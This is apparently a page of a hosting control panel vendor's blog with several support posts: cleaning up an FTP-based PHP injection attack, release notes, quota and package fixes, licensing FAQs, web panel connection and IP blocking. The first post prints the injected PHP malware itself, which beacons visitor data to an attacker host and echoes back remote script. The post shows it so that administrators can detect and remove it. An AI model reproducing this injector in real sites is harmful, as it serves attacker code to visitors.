Blog

KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unallowed changes at your hosting files and taking a look on them you find that they were updated with something similar to:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is done through the FTP server, downloading the original file and then updating it with the additional content. In essence, the attack looks for updating your files adding additional content without updating the rest.

This attack is possible because the password was stolen from a compromised equipment that has some virus or malware that looks for stored password at known locations or because an FTP session was opened using this password over an unsecure connection (like public wifis).

Solution

You have to find which files were updated to remove the “additional content added”. Also, you must reset password for all FTP accounts that were used to run this attack. Fortunetaly Core-Admin already includes an application that automates these tasks.

Follow next instructions to cleanup and reset all required FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it will report which files were updated and which FTP account were compromised. Now, run the tool again asking to fix this:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

Posted in: KB, Security

Leave a Comment (0) →

ANN: Core-Admin 1.0.32-3207 ready for download!

A new Core-Admin stable release is available with lots of features and corrections. Here is a brief description:

  1. NEW PLATFORMS: supported, Ubuntu Precise Pangolin LTS 12.04.3 andDebian Wheezy 7.0. See all our supported platforms here:
    http://www.core-admin.com/portal/get-it/supported-platforms
  2. IMPROVEMENTS: Dojo 1.6.2 is now default engine for web-client. Applied several updates to improve interface experience. Now installer is available in english and spanish. Now app installers are able to show a progress window with task completion (fully programmable and available to developers creating core-admin applications), and many more, see change-log.
  3. DEVELOPMENT: released core-admin app-builder to allow creating checkers and new applications on top of Core-Admin.
  4. GENERAL+SECURITY: many fixes and security updates were applied to this release. See log for more details.

See all details at the release note.

Posted in: Core-Admin, Releases

Leave a Comment (0) →

KB: 05112013-001: Webhosting management fails to add a new hosting reporting an error about quotas

Symptom

When trying to create a hosting inside Webhosting management, it fails with an error similar to:

setquota: Cannot open quotafile /home/aquota.user: Permission denied
setquota: Not all specified mountpoints are using quota.

Affected releases

All

Solution

Restart quota system. To do so you can use one the following methods:

  1. Run the following command if you have easy access to a root shell on the server:
    >> /etc/init.d/quota restart
  2. You can restart the service using “Process and services viewer”, by selecting “quota” service under unmanaged services. After selecting, use the restart option available.

Posted in: Core-Admin, Debian, Debian Lenny, Debian Squeeze, Debian Wheezy, KB

Leave a Comment (0) →

KB: 04112013-001: Mail admin installer because libmail-sender-perl is not found

Symptom

When launched Mail admin installer, it stops and fails reporting that libmail-sender-perl package isn’t found.

Affected releases

Debian Lenny (5.0), Debian Squeeze (6.0), Debian Wheezy (7.0)

Solution

  1. Update your /etc/apt/sources.list to include “non-free” declaration to default source of packages. A working example should like like:
    deb http://ftp.es.debian.org/debian/ squeeze main non-free
  2. After that, restart the installer again.

 

Posted in: Debian, Debian Lenny, Debian Squeeze, Debian Wheezy, KB

Leave a Comment (0) →

How to see my Core-Admin license and check its status?

Checking your current Core-Admin license codes

To see your current Core-Admin License codes, you must be log into Core-Admin as platform admin, and then click on the top menu System →  License manager.

This will launch the License manager application. Then click on “Summary” and it will display current license status.

Triggering a license codes check

If for whatever reason your Core-Admin server wasn’t able to check current installed license codes, you can trigger a check by clicking on the “Check license now” button which appears inside the Summary section.

Managing currently installed license codes

Under the the “License codes” section (on the left side tree), you’ll find currently installed license codes. There, you’ll be able to list license codes and to remove them.

Adding new license code

To add a new license code, just click on Options (located at the top toolbar)  →  Add license code. Then introduce the license code and wait for server confirmation.

Posted in: Licensing

Leave a Comment (0) →

Core-Admin Web Edition: what is included in the license?

A single Core-Admin Web Edition subscription license includes the following general items which are at the same time the elements that are allowed:

  • Support for running a central server and the web interface (turbulence and core-admin central server)
  • Support to accept one agent connecting to this server. More agents can be added by acquiring more Core-Admin Single Agent or similar subscription licenses (see options).
  • Support to create any kind of core-admin users and delegating permissions to them.  This is crucial for any situation where users must have low level permissions to administrate only those objects that they need.
  • Support to run any number of the Core-Admin base applications on any connected server.
  • Support to run one instance of Webhosting management, Mail Admin, Dns Admin and Shared FTP manager.
  • Support to get updates (security, critical and upgrades) at any time, without any limit.
  • Support to create any number of objects without any limit (mail plans, webhosting, etc..).

There are other elements that are allowed by this subscription license but these are the most relevant. Contact us if you have any additional question.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →

Core-Admin Free Web Edition: what is allowed commercially with this license?

You can use Core-Admin Free Web Edition subscription license for any commercial or private use, even for selling hosting services using Core-Admin. The only difference is that it limits the number of objects (web hostings, mail plans) and it also places some restrictions about the kind of core-admin users can can create (to name some).

To see more details about differences between Core-Admin Web Edition and its Free Edition, see the following page: http://www.core-admin.com/portal/get-it/web-edition

In the case you have a private or corporate server and you want to manage your organization’s web pages with Core-Admin, and without considering the purpose of those web pages, then you can use Core-Admin Free Web Edition.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →

Core-Admin Web Edition: what license subscription do I need for several servers?

It depends on the kind of setup you want to install. First you have to cover the base installation to have a Core-Admin central server where to join agents. Let’s see this first:

  • Independent servers: if you want to separate those servers making them to have independent administrations panels, you need one Core-Admin Web Edition subscription license for each server.
  • One panel, various servers: in the case you want to have a single panel controlling these servers, you need a single Core-Admin Web Edition subscription and one Core-Admin Single Agent subscription for each server you want to connect.

Now, you have to consider applications you want to run on those servers that are joined to the Core-Admin server:

  • In the case you want to have separate services in each server, for example, one server runs web services, other mail services and other dns services, you don’t need anything else because Core-Admin Web Edition includes support to run a single instance of all of those applications.
  • In the case you want additional applications you need to acquire a Core-Admin Standard Application subscription and indicate during the purchase process which application you need.
  • In the case you want all servers connected to a single central server but you still need to run all applications (dns, mail, web…) in all of them, it is cheaper to acquire one Core-Admin Web Edition subscription license for each of those servers instead of acquiring separate application.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →

Connecting to your Core-Admin web panel

Introduction: how to connect to Core-Admin server

Core-Admin provides a web panel interface to administrate and monitor services, applications and machines. To get a real-time interaction between users and these machines’ services, Core-Admin takes advantage of  BEEP (Block Extensible Exchange Protocol http://www.beepcore.org).

However,  BEEP is based on TCP/IP and this protocol is not available “as is” in the current web browsers and it is not likely to be in the near future. For that, Core-Admin uses two methods (and there may be more in the future) to enable TCP/IP availability (in fact, something similar), so your browser can talk “BEEP” with the central server it is trying to connect to.

These methods, both available through jsVortex, are the following:

  • WebSocket: if the browser has support for this new technology, it will be the default choice.
  • JavaSocketConector: otherwise, Core-Admin will use a java applet to enable TCP/IP access.

All modern browsers (those comming out since 2010), including Internet Explorer 8 and so forth, includes support for JavaSocketConnector. In fact, any browser that has support for Java will have support for JavaSocketConnector.

Steps to connect

By default, your Core-Admin web-client will try to connect through WebSocket (this is done automatically). In the case it is not posible (because WebSocket isn’t detected), JavaSocketConnector will be enabled. At any time, you enable/force to use a particular interface by clicking on the link at the bottom left part of the interface:

In the case your browser does not support WebSocket, Core-Admin will detect it and will enable JavaSocketConnector interface without making you to pay attention to this detail.

You’ll see this is happening when your core-admin is loaded from an URL direction ending by: /index-java.html

In both cases, using WebSocket or JavaSocketConnector, your core-admin client will attempt to connect through the 602/TCP port. Therefore, be sure there is no firewall blocking that internet connection.

Connecting to your core-admin server without a signed certificate while using WebSocket

If your Core-Admin server doesn’t have a TLS/SSL signed certificate (signed by a known party), then it is possible you’ll receive the following error when connecting using WebSocket (failed to connect to wss://):

Assuming your BEEP server is there (because that error may be confused by just having your server down), this is because the browser is detecting the certificate isn’t signed or it cannot be trusted. Users have complained about browsers not providing a dialog to accept even this connections, anyhow, current options to solve this problem are:

  • To get a TLS/SSL certificate signed by a known party. It is by far the easiest solution and it is also the recommended way in the case you expect to provide access to general users (for example, for webhosting services), but it involves a cost for signing the certificate. Core-Admin users have especial prices for certificate signing, see next: core-admin certificates.
  • To use JavaSocketConnector which doesn’t suffers from this problem.
  • Create a browser exception to allow this connection.

Creating a browser exception to enable WebSocket without certificate

Next, we will show you how to add an exception for various web browsers:

  • Google Chrome: create a direct access which runs the following command:
    >> google-chrome –ignore-certificate-errors –user-data-dir=/tmp/core-admin
  • Mozilla Firefox: get into certificate management section and add an exception. For that, select Edit -> Preferences -> Advanced -> Cyphering -> View certificates -> Add exception. Inside, add the core-admin’s server direction to which you are trying to connect to, for example: wss://core-admin.servidor.com:602
    It is really important to pass the right server name (the one provided in the installation) to make it match with the url access.

Core-admin browsers compatibility table

Next it is shown currently web browsers supported by Core-Admin, showing versions and connection method available for each of them:

Google Chrome Firefox Safari Internet Explorer Opera
WebSocket (RFC6455) support 16.0 or higher 11.0 or higher 6.0 or higher 10 or higher 12.0 or higher
Support for JavaSocketConector
(requires java applet)
13.0 or higher 2.0 or higher 5.0 or higher 8 or higher 8.0 or higher
Requires signed certificate when using WebSocket?
Can be added an exception while using WebSocket?

 

Posted in: Certificates, Core-Admin, JavaSocketConnector, WebSocket

Leave a Comment (0) →

How to block Ips and how to manage currently blocked IPs

Blocing IPs with Core-Admin

To be able to manage currently blocked IP you need a machine administrator or platform admin user.

Once you sign in into core-admin, select the machine you want to manage from the left side panel (Machines) and after the machine administrator panel show up, then  click on “Ip blocker (2)”

Inside that application you’ve got on the left side currently blocked Ips section. Click on it “Blacklisted IPs” (3).

After clicking, it’ll appear the list of currently blocked IPs on this specific server along with other information about the kind of blocking applied and why. To add a new IP to block, click on  ”Add blacklisted ip” (4) on the toolbar located at the top of the list:

This will show a new form where we have to indicate the IP to block (5).

It is also recommended to write a comment about the blocking (why or event it) so you can better identify this later.

We have to also choose between permanent or temporal blocking (6). If you select temporal blocking, we have indicate for how long we want it to be blocked. If you click on the   icon, you’ll see various references to time equivalences.

Then, please to “Add a new Blacklisted ip” (7) at the bottom to save changes.

 

Removing a blocked IP from Core-Admin

To remove an IP blocked we have to click on the Blacklisted IPs (3) section (on the left panel) as we did in previous section.

Then we have to click on the blacklisted IP record we want to remove (4):

After that, a new window will show up allowing to manage this IP blocked record.

Then we have to click on “Remove blacklisted IP” (5).

 

Adding IPs to the blocking exception list with Core-Admin

Another useful option we have available with ip blocker tool is the blocking exception. This will allow us to manage which IPs shouldn’t be blocked automatically due to security processes that are automatically activated by Core-Admin or applications using blocking services from it.

To add a blocking exception is pretty straightforward. Once we have launched the IP blocker application, (steps 1 and 2), we have to click on “Unblockable IPs”(3) and then click on “Add whitelisted ip” (4).

A new window will appear where we can fill the details about the IP that mustn’t be blocked even when requested.

We provide the IP at (5).

It is really recommended to provide a comment or an event id to better identify this record later.

We also indicate the kind of record:  permanent o temporal (6).

Once finished, click on  “Add a new whitelisted Ip” (7).

 

IP blocker integration with your scripts and applications: commands

IP blocker application includes a shell script and a Python interface that allows other applications to trigger blocking operations in a manner that is consistent with the platform and with the advantage that all these blocking operations can be managed through the core-admin interface.

Here is the list of commands that can be used:

  • Show current blocking list
    >> crad-ip-blocker.py -l
  • Add a temporal blocking for 3600 seconds
    >> crad-ip-blocker.py -a IP temporal 3600 “Why it was blocked”
  • Add a permanent block
    >> crad-ip-blocker.py -a IP permanent
  • Remove a blocking
    • First show current rules:
      >> crad-ip-blocker.py -l
    • Then, choose one (picking the id) and the run:
      >> crad-ip-blocker.py -r ID

 

Contact

Feel free to contact us if you have questions or doubts while using Core-Admin. Use the following contact information to reach us.

 

 

Posted in: Core-Admin, Security

Leave a Comment (0) →
Page 5 of 5 12345